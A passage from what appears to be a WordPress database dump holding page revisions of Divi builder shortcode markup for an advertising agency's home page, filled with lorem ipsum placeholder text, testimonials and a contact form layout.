Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-06 20:49:14','2020-07-06 20:49:14','',134,'https://52.66.212.87/2020/07/06/134-revision-v1/',0,'revision','',0),(252,1,'2020-07-06 20:50:13','2020-07-06 20:50:13','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency.An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" 